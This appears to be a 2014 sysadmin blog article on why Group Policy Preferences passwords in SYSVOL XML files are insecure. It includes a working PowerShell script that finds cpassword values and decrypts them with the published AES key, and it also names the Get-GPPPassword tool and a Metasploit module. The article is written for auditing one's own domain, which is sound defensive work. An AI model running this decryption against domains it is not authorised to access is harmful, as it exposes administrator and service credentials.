
May 14, 2014 Active Directory

Password Security with Group Policy Preferences

Group Policy Preferences (GPP) is a powerful extension of Windows group policy that makes configuring and managing a fleet of computers easier and replaces many of the logon/startup scripts administrators used to deploy through GPO. One of the things GPP can do is set the passwords of local and service accounts, and many administrators use this feature without realizing that it is insecure. In this article we explain why you should not use the password management features of Group Policy Preferences.

There are five different GPP policy types in which an administrator can store a user or administrator password:

  • Local Users and Groups – GPP can create or modify a local account and set its password (this policy is very often used to reset the local administrator password on every corporate PC)
  • Drive Maps – GPP can map a network drive using an explicit user name and password
  • Data Sources – when creating an ODBC data source, you can specify the user name and password of the account used to connect
  • Scheduled Tasks – a scheduled task can be configured to run under a specific user account and password
  • Services – GPP can specify the account and password under which a service runs (instead of the Local System account)

After the administrator saves a password in any of the GPP items listed above, it is written to an XML file inside the corresponding GPO folder, which is then replicated to the SYSVOL share on every domain controller. The password in the XML file is encrypted, but the encryption is AES-256 with a single fixed 32-byte key that is the same in every domain, and Microsoft itself has documented that key publicly. Encryption with a public key is no better than obfuscation.

Suppose the administrator has created a GPP policy that resets the local administrator password on all PCs. The system saves the encrypted password in the file Groups.xml in the GPO folder. Let's look at what this file contains (in our example it is stored under \\woshub.com\SYSVOL\woshub.com\Policies\{POLICY_ID}\Machine\Preferences\Groups).

Important. By design, all authenticated domain users have read access to the files stored in SYSVOL, and therefore to every GPO's preference XML files. This means that any domain user, not just administrators, can read your encrypted password.

[Figure: the encrypted password stored in the cpassword attribute of the GPO XML file]

The encrypted password is the value of the cpassword attribute. The most interesting part is that Microsoft has published the 32-byte (256-bit) AES key used to encrypt it in the MS-GPPREF protocol documentation on MSDN (http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx#endNote2).

[Figure: the 32-byte AES key used to encrypt GPP passwords, as published on MSDN]

So anyone can write a script that decrypts a password stored in such an XML file: AES is a symmetric cipher, so whoever knows the encryption key can recover the plaintext directly. There is no per-domain secret involved at all.

Note. You can download a script that decrypts a password stored in GPP here: Get-GPPPassword. We provide this link for reference and auditing of your own domain only; it must not be used for malicious purposes.
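The following PowerShell script is an added example written for this article; it is not the Get-GPPPassword script linked above and not code from Microsoft. It shows the decryption step the previous paragraphs describe and turns it into an audit: it walks a Policies folder, finds every preference XML that carries a cpassword attribute, and decrypts the value with the key from MSDN (AES-256-CBC, all-zero IV, PKCS7 padding, UTF-16LE plaintext, Base64 with the trailing "=" padding stripped). Because the script must run offline, it fabricates a sample Groups.xml in a temp folder with a constructed password; the function names, the sample GUID and the password are assumptions of this example. To audit a real domain, call Find-GppPassword with \\<domain>\SYSVOL\<domain>\Policies instead of the sample path.

```powershell
# Added example (not the article's or Microsoft's code): audit a Policies folder for
# GPP cpassword attributes and decrypt them with the AES-256 key published on MSDN.

# 32-byte AES-256 key from MS-GPPREF 2.2.1.1.4 "Password Encryption". This is a constant
# Microsoft published; it is identical in every domain, which is the whole problem.
$script:GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                          0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    # The exact parameters GPP uses: AES-256 in CBC mode, 16 zero bytes as IV, PKCS7 padding.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $script:GppKey
    $aes.IV      = New-Object byte[] 16
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    return $aes
}

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPP strips the Base64 '=' padding from cpassword; restore it before decoding.
    $b64 = $CPassword + ('=' * ((4 - $CPassword.Length % 4) % 4))
    $cipherBytes = [Convert]::FromBase64String($b64)
    $aes = New-GppAes
    try {
        $plainBytes = $aes.CreateDecryptor().TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
    } finally { $aes.Dispose() }
    # The decrypted bytes are the password as a UTF-16LE string.
    return [System.Text.Encoding]::Unicode.GetString($plainBytes)
}

function ConvertTo-GppPassword {
    # Inverse of ConvertFrom-GppPassword; used here only to fabricate a realistic sample file.
    param([Parameter(Mandatory)][string]$Password)
    $plainBytes = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes = New-GppAes
    try {
        $cipherBytes = $aes.CreateEncryptor().TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
    } finally { $aes.Dispose() }
    return ([Convert]::ToBase64String($cipherBytes)).TrimEnd('=')
}

function Find-GppPassword {
    # Walk a Policies folder and return one object per credential found in any preference XML.
    param([Parameter(Mandatory)][string]$PoliciesPath)
    $xmlNames = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path $PoliciesPath -Recurse -Include $xmlNames -File -ErrorAction SilentlyContinue |
      ForEach-Object {
        $file = $_.FullName
        [xml]$doc = Get-Content -Path $file -Raw
        # Every Properties element with a cpassword attribute holds a stored secret.
        foreach ($props in $doc.SelectNodes('//Properties[@cpassword]')) {
            $cp = $props.GetAttribute('cpassword')
            if ([string]::IsNullOrEmpty($cp)) { continue }   # empty cpassword = no password set
            [pscustomobject]@{
                File     = $file
                UserName = $props.GetAttribute('userName')
                Password = ConvertFrom-GppPassword -CPassword $cp
                Changed  = $props.ParentNode.GetAttribute('changed')
            }
        }
      }
}

# --- Constructed sample: a Groups.xml shaped like the one GPP writes for a local admin reset ---
# The GPO GUID, timestamp and password below are made up for this example.
$samplePolicies = Join-Path $env:TEMP ('gpp-demo-' + [guid]::NewGuid())
$sampleDir = Join-Path $samplePolicies '{11111111-2222-3333-4444-555555555555}\Machine\Preferences\Groups'
New-Item -ItemType Directory -Path $sampleDir -Force | Out-Null
$cp = ConvertTo-GppPassword -Password 'P@ssw0rd-Demo'
@"
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" changed="2014-05-14 10:15:00" uid="{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}">
    <Properties action="U" newName="" fullName="" description="" cpassword="$cp" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
</Groups>
"@ | Set-Content -Path (Join-Path $sampleDir 'Groups.xml') -Encoding UTF8

# Audit the sample folder: this prints the recovered plaintext 'P@ssw0rd-Demo'.
Find-GppPassword -PoliciesPath $samplePolicies | Format-List
Remove-Item -Path $samplePolicies -Recurse -Force
```

Run it as any domain user against the real SYSVOL path to see exactly what an attacker with nothing more than a domain account can recover; every non-empty result is a password that should be considered compromised and changed, and the corresponding XML entry removed.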

Starting with Windows Server 2012 / Windows Server 2012 R2, Microsoft added a warning about this insecure way of storing passwords. When you try to specify a password in a GPP item, the following message appears:

This password is stored as part of the GPO in SYSVOL and is discoverable, although obscured.

It is also important to note that a Metasploit module that collects and decrypts passwords stored in GPP (post/windows/gather/credentials/gpp) has existed since 2012, so attackers can run this attack almost fully automatically once they hold any domain account.

Note that Microsoft's security update MS14-025 (May 2014) removes the ability to save new passwords in these GPP items, but it does not delete passwords already written to SYSVOL: you still have to find the existing cpassword entries yourself, remove them from the policies, and change the affected account passwords.

So, will you go on using Group Policy Preferences to manage passwords?
